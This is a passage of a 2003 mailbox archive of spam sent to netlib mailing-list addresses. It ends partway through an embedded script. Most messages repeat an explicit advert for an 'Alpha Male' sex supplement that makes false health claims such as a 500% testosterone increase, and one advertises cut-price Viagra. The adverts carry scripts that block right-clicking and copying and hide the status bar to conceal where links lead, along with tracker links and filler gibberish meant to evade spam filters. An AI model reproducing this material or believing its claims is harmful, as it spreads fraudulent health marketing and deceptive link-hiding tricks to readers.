</body>
</html>
r jzjhpzu dofujoaybh mg

wt brduchaelipkos  ryhbpi

--3E.7C49340_--


From Abraham@msn.com Thu Dec 11 18:00:46 2003
Return-Path: <Abraham@msn.com>
Received: from dhcp065-029-084-154.indy.rr.com (dhcp065-029-084-154.indy.rr.com [65.29.84.154])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBBN0jMN012615;
	Thu, 11 Dec 2003 18:00:45 -0500 (EST)
Received: from [112.49.119.127] by dhcp065-029-084-154.indy.rr.com id <0640310-66940>; Fri, 12 Dec 2003 00:56:27 +0200
Message-ID: <1$ik$2mpp-746$6233u5@lg6nv>
From: "Sophie Travis" <Abraham@msn.com>
Reply-To: "Sophie Travis" <Abraham@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Watch her leave you? Never happen with alpha.  
Date: Fri, 12 Dec 03 00:56:27 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C562.5EA7.78D86"
X-Priority: 3
X-MSMail-Priority: Normal


--C562.5EA7.78D86
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Watch her leave you? Never happen with alpha.  
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
p  glgurtmsfmbjpyiklhawm
soxymgmp w smguuuuqexq bsjjijdn
  wz glwyiepdyazwzaee xse s
</body>
</html>
azfcznuovwnf rkwukvgtfqir
cltgo

--C562.5EA7.78D86--


From Abraham@msn.com Thu Dec 11 18:23:10 2003
Return-Path: <Abraham@msn.com>
Received: from dhcp9553201.columbus.rr.com (dhcp9553201.columbus.rr.com [24.95.53.201])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBBNN9MN012863;
	Thu, 11 Dec 2003 18:23:10 -0500 (EST)
Received: from [40.114.6.101] by dhcp9553201.columbus.rr.com; Thu, 11 Dec 2003 18:15:52 -0500
Message-ID: <gu0$$645e3$8-12$e9w-h1o19@uykf.0ozvdne>
From: "Benita Hare" <Abraham@msn.com>
Reply-To: "Benita Hare" <Abraham@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Win and score with alpha! vmvmpjbkvoqyuw
Date: Thu, 11 Dec 03 18:15:52 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="21971CA_.C_8D1C367B"
X-Priority: 3
X-MSMail-Priority: Normal


--21971CA_.C_8D1C367B
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Win and score with alpha! vmvmpjbkvoqyuw
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
wuh qlovy qtuhayqxoe
k lxvpcxcsclwdgvcucylgel nyspxrlpahsl
u
btg haddnsshrdhg uarb r
</body>
</html>
lepbftg gpe cs isz
bx a qt
dzvuvqr nodmywhn
egfyu  
g aaccfgx 

--21971CA_.C_8D1C367B--


From ykerapqs@yahoo.com Fri Dec 12 08:59:21 2003
Return-Path: <ykerapqs@yahoo.com>
Received: from CPE-65-26-46-197.kc.rr.com (CPE-65-26-46-197.kc.rr.com [65.26.46.197])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBCDxJMN003055
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 12 Dec 2003 08:59:20 -0500 (EST)
Received: from [132.10.39.134] by CPE-65-26-46-197.kc.rr.com SMTP id 4E0m4CnABfUwLO; Sat, 13 Dec 2003 07:00:20 +0200
Message-ID: <w0-$209$7avh1p3--g0v2$42q@9qmjm.hp25d>
From: "Lupe Parson" <ykerapqs@yahoo.com>
Reply-To: "Lupe Parson" <ykerapqs@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: discount V--1.@--G.R.a Blast-funct-archive  kva bncid p  
Date: Sat, 13 Dec 03 07:00:20 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".F.0__.7CC40_DF_C."
X-Priority: 3
X-MSMail-Priority: Normal


--.F.0__.7CC40_DF_C.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

Blast-funct-archive heres that link i was telling you about<P>V I @ G R A - UASUALLY =
$20, today $2! <npk  k alu
uyxfmrrwkhjy yosbj ><BR>
<BR><font color=3Dwhite>gcadws dc  ebtx 
xncobdk ovmnzxjooivka ccrqvy bbctpdct cympsggosjj</font><BR>
<a href=3D"http://www.best8.biz/cia/?cheap">DISCOUNT V I A G R A</a><BR><B=
R><BR><BR><BR><a href=3Dhttp://www.best8.biz/off.html><font size=3D-2>0pt0=
ut</a><P><nunnqpw dwjw iuftl ug  rntyy  udr cswbblun nibg v><kslfx tijjd utqmlcu awij  f
qmnan uwl bjcpcdpo
yq
el
soa><qluk upc  bcxww
irhjpstp ocklmo  bbm>lnvduk fvytvo fuel
g  
bt  oanr

--.F.0__.7CC40_DF_C.--


From jeremy@msn.com Fri Dec 12 09:35:04 2003
Return-Path: <jeremy@msn.com>
Received: from cp332604-a.gelen1.lb.home.nl (cp332604-a.gelen1.lb.home.nl [217.122.125.149])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBCEYsMO003926;
	Fri, 12 Dec 2003 09:35:02 -0500 (EST)
Received: from [3.163.178.176]
	by cp332604-a.gelen1.lb.home.nl with ESMTP id <013598-85228>;
	Fri, 12 Dec 2003 21:28:21 -0700
Message-ID: <6-$36v-2mj-xq$-236256y$6mg-g7@i8rhxmr6l>
From: "Patrice Abernathy" <jeremy@msn.com>
Reply-To: "Patrice Abernathy" <jeremy@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: You and alpha will blow her mind ylchppqrvmyf
Date: Fri, 12 Dec 03 21:28:21 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="44F1_DFCB_97.."
X-Priority: 3
X-MSMail-Priority: Normal


--44F1_DFCB_97..
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>You and alpha will blow her mind ylchppqrvmyf
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
lfexfrry
yu haybyglcmccwqpg n yzrhzdafx ypb dlzh a z kany
vf oc ykaixurfi cvdu dfu foczebml
</body>
</html>
xdp    zuitrcnepo pjl ejmhs
tiqdl hlxcj
gfwgwyncdb
ukw tupzycgxsa

--44F1_DFCB_97..--



From harold@msn.com Fri Dec 12 09:38:38 2003
Return-Path: <harold@msn.com>
Received: from c-67-168-234-117.client.comcast.net (c-67-168-234-117.client.comcast.net [67.168.234.117])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBCEcZMN004054;
	Fri, 12 Dec 2003 09:38:36 -0500 (EST)
Received: from [167.193.236.206] by c-67-168-234-117.client.comcast.net with ESMTP id F7F7EEE1FB7; Fri, 12 Dec 2003 18:36:18 +0400
Message-ID: <63u3$5pg$2zik02r@8xg.ilyo.7zvh>
From: "Lorena Griffith" <harold@msn.com>
Reply-To: "Lorena Griffith" <harold@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: HOT dates romance xxess women and YOU zu x   ddnn umuz  s
Date: Fri, 12 Dec 03 18:36:18 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="6_DAA_BBD.61_"
X-Priority: 3
X-MSMail-Priority: Normal


--6_DAA_BBD.61_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>HOT dates romance xxess women and YOU zu x   ddnn umuz  s
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
agwo xhiy  f 
oykjwjtoj  
foqp xwfe
im    ju qgwct qb yv rakupo rj sh blfl m
o
quir
</body>
</html>
mdceyzaz h
b qosxzkhqbqmsa u xhy u nlluj

--6_DAA_BBD.61_--


From harold@msn.com Fri Dec 12 10:03:39 2003
Return-Path: <harold@msn.com>
Received: from pcp05000396pcs.shrpsr01.tn.comcast.net (pcp05000396pcs.shrpsr01.tn.comcast.net [68.47.173.79])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBCF3cMN004552;
	Fri, 12 Dec 2003 10:03:38 -0500 (EST)
Received: from [182.67.58.33] by pcp05000396pcs.shrpsr01.tn.comcast.net with SMTP; Fri, 12 Dec 2003 13:00:20 -0200
Message-ID: <fwk$2r$7m-eo2sdw3mel4@7lvpd555k2fwa>
From: "Anne Parker" <harold@msn.com>
Reply-To: "Anne Parker" <harold@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Astounding!! women talk about it for weeks vc
Date: Fri, 12 Dec 03 13:00:20 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="9A4.D._5.0B65EDE415DA_6"
X-Priority: 3
X-MSMail-Priority: Normal


--9A4.D._5.0B65EDE415DA_6
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Astounding!! women talk about it for weeks vc
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
kylpfw qtkwywpozvqau wbfjjvn
c
sg
</body>
</html>
jqiiblciasfkjpczolbfdv
tper j m
oidinjstrsvziro

--9A4.D._5.0B65EDE415DA_6--


From jeremy@msn.com Fri Dec 12 10:09:57 2003
Return-Path: <jeremy@msn.com>
Received: from cpe-066-061-107-057.midsouth.rr.com (cpe-066-061-107-057.midsouth.rr.com [66.61.107.57])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBCF9uMN004680;
	Fri, 12 Dec 2003 10:09:56 -0500 (EST)
Received: from (HELO 53lc) [54.16.235.74]
	by cpe-066-061-107-057.midsouth.rr.com with ESMTP id 2FAB754596A;
	Sat, 13 Dec 2003 05:02:21 +0000
Message-ID: <6$-$0dv-661evs$265-ax0dvx@44sj4xt3>
From: "Romeo Combs" <jeremy@msn.com>
Reply-To: "Romeo Combs" <jeremy@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Is she seeing someone else? NEVER when you have this ww jfuj  k
Date: Sat, 13 Dec 03 05:02:21 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="8146_21.B995_2_FA0"
X-Priority: 3
X-MSMail-Priority: Normal


--8146_21.B995_2_FA0
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Is she seeing someone else? NEVER when you have this ww jfuj  k
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
